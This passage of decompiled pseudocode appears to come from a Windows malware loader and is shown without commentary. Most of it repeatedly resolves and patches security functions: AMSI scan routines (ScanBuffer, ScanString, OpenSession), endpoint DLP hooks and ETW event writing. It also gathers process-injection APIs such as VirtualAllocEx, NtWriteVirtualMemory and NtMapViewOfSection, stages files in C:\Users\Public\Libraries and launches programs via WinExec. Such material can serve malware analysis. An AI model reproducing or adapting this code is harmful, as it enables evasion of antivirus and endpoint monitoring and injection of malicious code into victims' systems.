								_push(_v4428);
								E032A4698( &_v4432, "bcrypt");
								_pop(_t6308);
								E032B7C04(_v4432,  *0x33d28a8, _t6308, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v4436, E032A4964(_v4440));
								_push(_v4436);
								E032A47B0( &_v4448,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4444, E032A4964(_v4448));
								_pop(_t6313);
								E032B7C04(_v4444,  *0x33d28a8, _t6313, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("Initialize");
								E032A4824();
								E032A4698( &_v4452, E032A4964(_v4456));
								_push(_v4452);
								E032A47B0( &_v4464,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4460, E032A4964(_v4464));
								_pop(_t6318);
								E032B7C04(_v4460,  *0x33d28a8, _t6318, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v4468, E032A4964(_v4472));
								_push(_v4468);
								_t5632 =  *0x33d28a8;
								E032A47B0( &_v4480,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4476, E032A4964(_v4480));
								_pop(_t6323);
								E032B7C04(_v4476,  *0x33d28a8, _t6323, __eflags);
								E032A4698( &_v4484, "DlpNotifyPreDragDrop");
								_push(_v4484);
								E032A4698( &_v4488, "endpointdlp");
								_pop(_t6326);
								E032B7C04(_v4488,  *0x33d28a8, _t6326, __eflags);
								E032A4698( &_v4492, "DlpCheckIsCloudSyncApp");
								_push(_v4492);
								E032A4698( &_v4496, "endpointdlp");
								_pop(_t6329);
								E032B7C04(_v4496,  *0x33d28a8, _t6329, __eflags);
								E032A4698( &_v4500, "DlpGetArchiveFileTraceInfo");
								_push(_v4500);
								E032A4698( &_v4504, "endpointdlp");
								_pop(_t6332);
								E032B7C04(_v4504,  *0x33d28a8, _t6332, __eflags);
								E032A4698( &_v4508, "DlpGetWebSiteAccess");
								_push(_v4508);
								E032A4698( &_v4512, "endpointdlp");
								_pop(_t6335);
								E032B7C04(_v4512, _t5632, _t6335, __eflags);
								E032A4698( &_v4516, "NtAlertResumeThread");
								_push(_v4516);
								E032A4698( &_v4520, "ntdll");
								_pop(_t6338);
								E032B7C04(_v4520, _t5632, _t6338, __eflags);
								E032A4698( &_v4524, "RtlAllocateHeap");
								_push(_v4524);
								E032A4698( &_v4528, "ntdll");
								_pop(_t6341);
								E032B7C04(_v4528, _t5632, _t6341, __eflags);
								E032A4698( &_v4532, "NtWaitForSingleObject");
								_push(_v4532);
								E032A4698( &_v4536, "ntdll");
								_pop(_t6344);
								E032B7C04(_v4536, _t5632, _t6344, __eflags);
								E032A4698( &_v4540, "RtlAllocateHeap");
								_push(_v4540);
								E032A4698( &_v4544, "ntdll");
								_pop(_t6347);
								E032B7C04(_v4544, _t5632, _t6347, __eflags);
								E032A4698( &_v4548, "RtlCreateQueryDebugBuffer");
								_push(_v4548);
								E032A4698( &_v4552, "ntdll");
								_pop(_t6350);
								E032B7C04(_v4552, _t5632, _t6350, __eflags);
								E032B7C04(0x32c7160, _t5632, "NtQuerySystemInformation", __eflags);
								E032B7C04(0x32c7160, _t5632, "NtDeviceIoControlFile", __eflags);
								E032B7C04(0x32c7160, _t5632, "NtQueryDirectoryFile", __eflags);
								E032B7C04(0x32c7160, _t5632, "RtlQueryProcessDebugInformation", __eflags);
								E032B7C04("Advapi", _t5632, "EnumServicesStatusA", __eflags);
								E032B7C04("Advapi", _t5632, "EnumServicesStatusW", __eflags);
								E032B7C04("Advapi", _t5632, "EnumServicesStatusExA", __eflags);
								E032B7C04("Advapi", _t5632, "EnumServicesStatusExW", __eflags);
								E032B7C04(0x32c727c, _t5632, "EnumProcessModules", __eflags);
								E032B7C04("Kernel32", _t5632, "CreateProcessA", __eflags);
								E032B7C04("Kernel32", _t5632, "CreateProcessW", __eflags);
								E032B7C04("Advapi", _t5632, "CreateProcessAsUserA", __eflags);
								E032B7C04("Advapi", _t5632, "CreateProcessAsUserW", __eflags);
								E032B7C04("Advapi", _t5632, "CreateProcessWithLogonW", __eflags);
								E032B7C04("ws2_32", _t5632, "connect", __eflags);
								E032B7C04("Kernel32", _t5632, "CreateProcessAsUserW", __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("UacInitialize");
								E032A4824();
								E032A4698( &_v4556, E032A4964(_v4560));
								_push(_v4556);
								E032A47B0( &_v4568,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4564, E032A4964(_v4568));
								_pop(_t6371);
								E032B7C04(_v4564,  *0x33d28a8, _t6371, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v4572, E032A4964(_v4576));
								_push(_v4572);
								E032A47B0( &_v4584,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4580, E032A4964(_v4584));
								_pop(_t6376);
								E032B7C04(_v4580,  *0x33d28a8, _t6376, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v4588, E032A4964(_v4592));
								_push(_v4588);
								_t5635 =  *0x33d28a8;
								E032A47B0( &_v4600,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4596, E032A4964(_v4600));
								_pop(_t6381);
								E032B7C04(_v4596,  *0x33d28a8, _t6381, __eflags);
								E032A4698( &_v4604, "VirtualAlloc");
								_push(_v4604);
								E032A4698( &_v4608, "kernel32");
								_pop(_t6384);
								E032B7C04(_v4608,  *0x33d28a8, _t6384, __eflags);
								E032A4698( &_v4612, "VirtualAllocEx");
								_push(_v4612);
								E032A4698( &_v4616, "kernel32");
								_pop(_t6387);
								E032B7C04(_v4616,  *0x33d28a8, _t6387, __eflags);
								E032A4698( &_v4620, "VirtualProtect");
								_push(_v4620);
								E032A4698( &_v4624, "kernel32");
								_pop(_t6390);
								E032B7C04(_v4624,  *0x33d28a8, _t6390, __eflags);
								E032A4698( &_v4628, "OpenProcess");
								_push(_v4628);
								E032A4698( &_v4632, "kernel32");
								_pop(_t6393);
								E032B7C04(_v4632, _t5635, _t6393, __eflags);
								E032A4698( &_v4636, "WriteVirtualMemory");
								_push(_v4636);
								E032A4698( &_v4640, "kernel32");
								_pop(_t6396);
								E032B7C04(_v4640, _t5635, _t6396, __eflags);
								E032A4698( &_v4644, "FlushInstructionCache");
								_push(_v4644);
								E032A4698( &_v4648, "kernel32");
								_pop(_t6399);
								E032B7C04(_v4648, _t5635, _t6399, __eflags);
								E032A4698( &_v4652, "SetUnhandledExceptionFilter");
								_push(_v4652);
								E032A4698( &_v4656, "kernel32");
								_pop(_t6402);
								E032B7C04(_v4656, _t5635, _t6402, __eflags);
								E032A4698( &_v4660, "NtGetWriteWatch");
								_push(_v4660);
								E032A4698( &_v4664, "ntdll");
								_pop(_t6405);
								E032B7C04(_v4664, _t5635, _t6405, __eflags);
								E032A4698( &_v4668, "NtQueryVirtualMemory");
								_push(_v4668);
								E032A4698( &_v4672, "ntdll");
								_pop(_t6408);
								E032B7C04(_v4672, _t5635, _t6408, __eflags);
								E032A4698( &_v4676, "NtQueryInformationThread");
								_push(_v4676);
								E032A4698( &_v4680, "ntdll");
								_pop(_t6411);
								E032B7C04(_v4680, _t5635, _t6411, __eflags);
								E032A4698( &_v4684, "NtOpenSection");
								_push(_v4684);
								E032A4698( &_v4688, "ntdll");
								_pop(_t6414);
								E032B7C04(_v4688, _t5635, _t6414, __eflags);
								E032A4698( &_v4692, "NtCreateSection");
								_push(_v4692);
								E032A4698( &_v4696, "ntdll");
								_pop(_t6417);
								E032B7C04(_v4696, _t5635, _t6417, __eflags);
								E032A4698( &_v4700, "NtMapViewOfSection");
								_push(_v4700);
								E032A4698( &_v4704, "ntdll");
								_pop(_t6420);
								E032B7C04(_v4704, _t5635, _t6420, __eflags);
								E032A4698( &_v4708, "NtReadVirtualMemory");
								_push(_v4708);
								E032A4698( &_v4712, "ntdll");
								_pop(_t6423);
								E032B7C04(_v4712, _t5635, _t6423, __eflags);
								E032A4698( &_v4716, "NtQuerySecurityObject");
								_push(_v4716);
								E032A4698( &_v4720, "ntdll");
								_pop(_t6426);
								E032B7C04(_v4720, _t5635, _t6426, __eflags);
								E032A4698( &_v4724, "NtAccessCheck");
								_push(_v4724);
								E032A4698( &_v4728, "ntdll");
								_pop(_t6429);
								E032B7C04(_v4728, _t5635, _t6429, __eflags);
								E032A4698( &_v4732, "LdrLoadDll");
								_push(_v4732);
								E032A4698( &_v4736, "ntdll");
								_pop(_t6432);
								E032B7C04(_v4736, _t5635, _t6432, __eflags);
								E032A4698( &_v4740, "LdrGetProcedureAddress");
								_push(_v4740);
								E032A4698( &_v4744, "ntdll");
								_pop(_t6435);
								E032B7C04(_v4744, _t5635, _t6435, __eflags);
								E032A4698( &_v4748, "NtWriteVirtualMemory");
								_push(_v4748);
								E032A4698( &_v4752, "ntdll");
								_pop(_t6438);
								E032B7C04(_v4752, _t5635, _t6438, __eflags);
								E032A4698( &_v4756, "NtOpenFile");
								_push(_v4756);
								E032A4698( &_v4760, "ntdll");
								_pop(_t6441);
								E032B7C04(_v4760, _t5635, _t6441, __eflags);
								E032A4698( &_v4764, "EtwEventWriteEx");
								_push(_v4764);
								E032A4698( &_v4768, "ntdll");
								_pop(_t6444);
								E032B7C04(_v4768, _t5635, _t6444, __eflags);
								E032A4698( &_v4772, "EtwEventWrite");
								_push(_v4772);
								E032A4698( &_v4776, "ntdll");
								_pop(_t6447);
								E032B7C04(_v4776, _t5635, _t6447, __eflags);
								FlushInstructionCache(GetCurrentProcess(), 0, 0);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("Initialize");
								E032A4824();
								E032A4698( &_v4780, E032A4964(_v4784));
								_push(_v4780);
								E032A47B0( &_v4792,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4788, E032A4964(_v4792));
								_pop(_t6452);
								E032B7C04(_v4788,  *0x33d28a8, _t6452, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v4796, E032A4964(_v4800));
								_push(_v4796);
								E032A47B0( &_v4808,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4804, E032A4964(_v4808));
								_pop(_t6457);
								E032B7C04(_v4804,  *0x33d28a8, _t6457, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v4812, E032A4964(_v4816));
								_push(_v4812);
								E032A47B0( &_v4824,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v4820, E032A4964(_v4824));
								_pop(_t6462);
								E032B7C04(_v4820,  *0x33d28a8, _t6462, __eflags);
								E032B7B14(GetCurrentProcess(), "NtOpenProcess");
								ExitProcess(0);
								goto L49;
							} else {
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v3524, E032A4964(_v3528));
								_push(_v3524);
								E032A47B0( &_v3536,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3532, E032A4964(_v3536));
								_pop(_t6625);
								E032B7C04(_v3532,  *0x33d28a8, _t6625, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v3540, E032A4964(_v3544));
								_push(_v3540);
								E032A47B0( &_v3552,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3548, E032A4964(_v3552));
								_pop(_t6630);
								E032B7C04(_v3548,  *0x33d28a8, _t6630, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v3556, E032A4964(_v3560));
								_push(_v3556);
								E032A47B0( &_v3568,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3564, E032A4964(_v3568));
								_pop(_t6635);
								E032B7C04(_v3564,  *0x33d28a8, _t6635, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v3572, E032A4964(_v3576));
								_push(_v3572);
								E032A47B0( &_v3584,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3580, E032A4964(_v3584));
								_pop(_t6640);
								E032B7C04(_v3580,  *0x33d28a8, _t6640, __eflags);
								E032A47B0( &_v3588,  *0x33d2820, "C:\\Windows\\System32\\");
								WinExec(E032A4964(_v3588), 0);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v3592, E032A4964(_v3596));
								_push(_v3592);
								E032A47B0( &_v3604,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3600, E032A4964(_v3604));
								_pop(_t6646);
								E032B7C04(_v3600,  *0x33d28a8, _t6646, __eflags);
								E032A4698( &_v3608, E032A4964( *0x33d2820));
								E032BA3A4(_v3608, _t5539, 0x33d2888, _t7104, _t7105, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("Initialize");
								E032A4824();
								E032A4698( &_v3612, E032A4964(_v3616));
								_push(_v3612);
								E032A47B0( &_v3624,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3620, E032A4964(_v3624));
								_pop(_t6653);
								E032B7C04(_v3620,  *0x33d28a8, _t6653, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v3628, E032A4964(_v3632));
								_push(_v3628);
								E032A47B0( &_v3640,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3636, E032A4964(_v3640));
								_pop(_t6658);
								E032B7C04(_v3636,  *0x33d28a8, _t6658, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v3644, E032A4964(_v3648));
								_push(_v3644);
								E032A47B0( &_v3656,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3652, E032A4964(_v3656));
								_pop(_t6663);
								E032B7C04(_v3652,  *0x33d28a8, _t6663, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v3660, E032A4964(_v3664));
								_push(_v3660);
								E032A47B0( &_v3672,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3668, E032A4964(_v3672));
								_pop(_t6668);
								E032B7C04(_v3668,  *0x33d28a8, _t6668, __eflags);
								 *0x33d278c = E032A3694(1);
								_push(_t7107);
								_push(0x32c4646);
								_push( *[fs:edx]);
								 *[fs:edx] = _t7108;
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v3676, E032A4964(_v3680));
								_push(_v3676);
								E032A47B0( &_v3688,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3684, E032A4964(_v3688));
								_pop(_t6675);
								E032B7C04(_v3684,  *0x33d28a8, _t6675, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v3692, E032A4964(_v3696));
								_push(_v3692);
								E032A47B0( &_v3704,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3700, E032A4964(_v3704));
								_pop(_t6680);
								E032B7C04(_v3700,  *0x33d28a8, _t6680, __eflags);
								_v1112 =  *0x33d2870;
								_t5691 = _v1112;
								__eflags = _t5691;
								if(_t5691 != 0) {
									_t5702 = _t5691 - 4;
									__eflags = _t5702;
									_t5691 =  *_t5702;
								}
								asm("cdq");
								E032B593C( *0x33d278c, _t5691, _t6680);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v3708, E032A4964(_v3712));
								_push(_v3708);
								E032A47B0( &_v3720,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3716, E032A4964(_v3720));
								_pop(_t6685);
								E032B7C04(_v3716,  *0x33d28a8, _t6685, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v3724, E032A4964(_v3728));
								_push(_v3724);
								E032A47B0( &_v3736,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3732, E032A4964(_v3736));
								_pop(_t6690);
								E032B7C04(_v3732,  *0x33d28a8, _t6690, __eflags);
								E032B5AE4( *0x33d278c,  *((intOrPtr*)( *((intOrPtr*)( *0x33d278c))))() + _t4378 +  *((intOrPtr*)( *((intOrPtr*)( *0x33d278c))))() + _t4378,  *0x33d2870);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v3740, E032A4964(_v3744));
								_push(_v3740);
								E032A47B0( &_v3752,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3748, E032A4964(_v3752));
								_pop(_t6697);
								E032B7C04(_v3748,  *0x33d28a8, _t6697, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanBuffer");
								E032A4824();
								E032A4698( &_v3756, E032A4964(_v3760));
								_push(_v3756);
								E032A47B0( &_v3768,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3764, E032A4964(_v3768));
								_pop(_t6702);
								E032B7C04(_v3764,  *0x33d28a8, _t6702, __eflags);
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("OpenSession");
								E032A4824();
								E032A4698( &_v3772, E032A4964(_v3776));
								_push(_v3772);
								E032A47B0( &_v3784,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v3780, E032A4964(_v3784));
								_pop(_t6707);
								E032B7C04(_v3780,  *0x33d28a8, _t6707, __eflags);
								E032BA6F4(_t5539, _t7104, _t7105,  *0x33d278c,  *0x33d2888);
								__eflags = 0;
								_pop(_t6708);
								 *[fs:eax] = _t6708;
								_push(0x32c464d);
								return E032A36C4( *0x33d278c);
							}
						} else {
							_push( *0x33d287c);
							_push(0x32c6d78);
							_push(0x32c6e54);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x32c6e60);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x32c6e48);
							E032A4824();
							E032A4698( &_v2396, E032A4964(_v2400));
							_t4435 = E032A7E40(_v2396);
							__eflags = _t4435;
							if(_t4435 != 0) {
								goto L32;
							} else {
								_push(0x32c6aa0);
								_push( *0x33d28a8);
								_push("ScanString");
								E032A4824();
								E032A4698( &_v2404, E032A4964(_v2408));
								_push(_v2404);
								E032A47B0( &_v2416,  *0x33d28a8, 0x32c6aa0);
								E032A4698( &_v2412, E032A4964(_v2416));
								_pop(_t6715);
								E032B7C04(_v2412,  *0x33d28a8, _t6715, __eflags);
								E032A4698( &_v2420, "C:\\Windows\\SysWOW64");
								_t4453 = E032A7E64(_v2420);
								__eflags = _t4453;
								if(_t4453 == 0) {
									goto L32;
								} else {
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("Initialize");
									E032A4824();
									E032A4698( &_v2424, E032A4964(_v2428));
									_push(_v2424);
									E032A47B0( &_v2436,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v2432, E032A4964(_v2436));
									_pop(_t6721);
									E032B7C04(_v2432,  *0x33d28a8, _t6721, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("OpenSession");
									E032A4824();
									E032A4698( &_v2440, E032A4964(_v2444));
									_push(_v2440);
									E032A47B0( &_v2452,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v2448, E032A4964(_v2452));
									_pop(_t6726);
									E032B7C04(_v2448,  *0x33d28a8, _t6726, __eflags);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push("ScanBuffer");
									E032A4824();
									E032A4698( &_v2456, E032A4964(_v2460));
									_push(_v2456);
									E032A47B0( &_v2468,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v2464, E032A4964(_v2468));
									_pop(_t6731);
									E032B7C04(_v2464,  *0x33d28a8, _t6731, __eflags);
									 *0x33d2884 = E032A3694(1);
									 *[fs:eax] = _t7108;
									E032A2F08(0x64);
									E032A7974( &_v2472);
									 *((intOrPtr*)( *((intOrPtr*)( *0x33d2884)) + 0x38))( *[fs:eax], 0x32c2571, _t7107);
									_push(0x32c6aa0);
									_push( *0x33d28a8);
									_push(0x32c6e80);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push("acS");
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push("can");
									E032A4824();
									E032A4698( &_v2476, E032A4964(_v2480));
									_push(_v2476);
									E032A47B0( &_v2488,  *0x33d28a8, 0x32c6aa0);
									E032A4698( &_v2484, E032A4964(_v2488));
									_pop(_t6739);
									E032B7C04(_v2484,  *0x33d28a8, _t6739, __eflags);
									E032A4824();
									E032A4698( &_v2492, E032A4964(_v2496));
									 *((intOrPtr*)( *((intOrPtr*)( *0x33d2884)) + 0x74))(0, 0, 0, 0, 0, 0, 0, 0x32c6e60, 0, 0, 0, 0, 0, 0, 0, 0x32c6e54, 0x32c6d78,  *0x33d287c);
									__eflags = 0;
									_t6743 = 0x32c6e48;
									 *[fs:eax] = _t6743;
									_push(0x32c2578);
									return E032A36C4( *0x33d2884);
								}
							}
						}
					} else {
						_push("C:\\Users\\Public\\");
						_push( *0x33d28cc);
						_push(".url");
						E032A4824();
						E032A4698( &_v1656, E032A4964(_v1660));
						_t4535 = E032A7E40(_v1656);
						_t7123 = _t4535;
						if(_t4535 != 0) {
							goto L28;
						} else {
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("UacInitialize");
							E032A4824();
							E032A4698( &_v1664, E032A4964(_v1668));
							_push(_v1664);
							E032A47B0( &_v1676,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1672, E032A4964(_v1676));
							_pop(_t6750);
							E032B7C04(_v1672,  *0x33d28a8, _t6750, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v1680, E032A4964(_v1684));
							_push(_v1680);
							E032A47B0( &_v1692,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1688, E032A4964(_v1692));
							_pop(_t6755);
							E032B7C04(_v1688,  *0x33d28a8, _t6755, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v1696, E032A4964(_v1700));
							_push(_v1696);
							E032A47B0( &_v1708,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1704, E032A4964(_v1708));
							_pop(_t6760);
							E032B7C04(_v1704,  *0x33d28a8, _t6760, _t7123);
							_push( *0x33d287c);
							_push(0x32c6d78);
							_push( *0x33d28cc);
							E032A4824();
							E032A4698(0x33d28c8, E032A4964(_v1712));
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v1716, E032A4964(_v1720));
							_push(_v1716);
							E032A47B0( &_v1728,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1724, E032A4964(_v1728));
							_pop(_t6767);
							E032B7C04(_v1724,  *0x33d28a8, _t6767, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("Initialize");
							E032A4824();
							E032A4698( &_v1732, E032A4964(_v1736));
							_push(_v1732);
							E032A47B0( &_v1744,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1740, E032A4964(_v1744));
							_pop(_t6772);
							E032B7C04(_v1740,  *0x33d28a8, _t6772, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v1748, E032A4964(_v1752));
							_push(_v1748);
							E032A47B0( &_v1760,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1756, E032A4964(_v1760));
							_pop(_t6777);
							E032B7C04(_v1756,  *0x33d28a8, _t6777, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v1764, E032A4964(_v1768));
							_push(_v1764);
							E032A47B0( &_v1776,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1772, E032A4964(_v1776));
							_pop(_t6782);
							E032B7C04(_v1772,  *0x33d28a8, _t6782, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v1780, E032A4964(_v1784));
							_push(_v1780);
							E032A47B0( &_v1792,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1788, E032A4964(_v1792));
							_pop(_t6787);
							E032B7C04(_v1788,  *0x33d28a8, _t6787, _t7123);
							_push("C:\\\\Users\\\\Public\\\\Libraries\\\\");
							_push( *0x33d28cc);
							_push(0x32c6dac);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x32c6db8);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x32c6dc4);
							E032A4824();
							E032A4698(0x33d27ec, E032A4964(_v1796));
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("UacScan");
							E032A4824();
							E032A4698( &_v1800, E032A4964(_v1804));
							_push(_v1800);
							E032A47B0( &_v1812,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1808, E032A4964(_v1812));
							_pop(_t6794);
							E032B7C04(_v1808,  *0x33d28a8, _t6794, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v1816, E032A4964(_v1820));
							_push(_v1816);
							E032A47B0( &_v1828,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1824, E032A4964(_v1828));
							_pop(_t6799);
							E032B7C04(_v1824,  *0x33d28a8, _t6799, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("Initialize");
							E032A4824();
							E032A4698( &_v1832, E032A4964(_v1836));
							_push(_v1832);
							E032A47B0( &_v1844,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1840, E032A4964(_v1844));
							_pop(_t6804);
							E032B7C04(_v1840,  *0x33d28a8, _t6804, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v1848, E032A4964(_v1852));
							_push(_v1848);
							E032A47B0( &_v1860,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1856, E032A4964(_v1860));
							_pop(_t6809);
							E032B7C04(_v1856,  *0x33d28a8, _t6809, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v1864, E032A4964(_v1868));
							_push(_v1864);
							E032A47B0( &_v1876,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1872, E032A4964(_v1876));
							_pop(_t6814);
							E032B7C04(_v1872,  *0x33d28a8, _t6814, _t7123);
							E032A4DA4( &_v1880,  *0x33d27ec);
							_push(_v1880);
							E032A4DA4( &_v1888,  *0x33d2878);
							E032A4728( &_v1884, _v1888);
							_pop(_t6818);
							E032BCB04(_v1884, _t5539, _t6818, _t7105);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v1892, E032A4964(_v1896));
							_push(_v1892);
							E032A47B0( &_v1904,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1900, E032A4964(_v1904));
							_pop(_t6823);
							E032B7C04(_v1900,  *0x33d28a8, _t6823, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanString");
							E032A4824();
							E032A4698( &_v1908, E032A4964(_v1912));
							_push(_v1908);
							E032A47B0( &_v1920,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1916, E032A4964(_v1920));
							_pop(_t6828);
							E032B7C04(_v1916,  *0x33d28a8, _t6828, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v1924, E032A4964(_v1928));
							_push(_v1924);
							E032A47B0( &_v1936,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1932, E032A4964(_v1936));
							_pop(_t6833);
							E032B7C04(_v1932,  *0x33d28a8, _t6833, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v1940, E032A4964(_v1944));
							_push(_v1940);
							E032A47B0( &_v1952,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1948, E032A4964(_v1952));
							_pop(_t6838);
							E032B7C04(_v1948,  *0x33d28a8, _t6838, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("Initialize");
							E032A4824();
							E032A4698( &_v1956, E032A4964(_v1960));
							_push(_v1956);
							E032A47B0( &_v1968,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1964, E032A4964(_v1968));
							_pop(_t6843);
							E032B7C04(_v1964,  *0x33d28a8, _t6843, _t7123);
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("ScanBuffer");
							E032A4824();
							E032A4698( &_v1972, E032A4964(_v1976));
							_push(_v1972);
							E032A47B0( &_v1984,  *0x33d28a8, 0x32c6aa0);
							E032A4698( &_v1980, E032A4964(_v1984));
							_pop(_t6848);
							E032B7C04(_v1980,  *0x33d28a8, _t6848, _t7123);
							 *0x33d2884 = E032A3694(1);
							_push(_t7107);
							_push(0x32c18e2);
							_push( *[fs:eax]);
							 *[fs:eax] = _t7108;
							_push(0x32c6aa0);
							_push( *0x33d28a8);
							_push("OpenSession");
							E032A4824();
							E032A4698( &_v1988, E032A4964(_v1992));
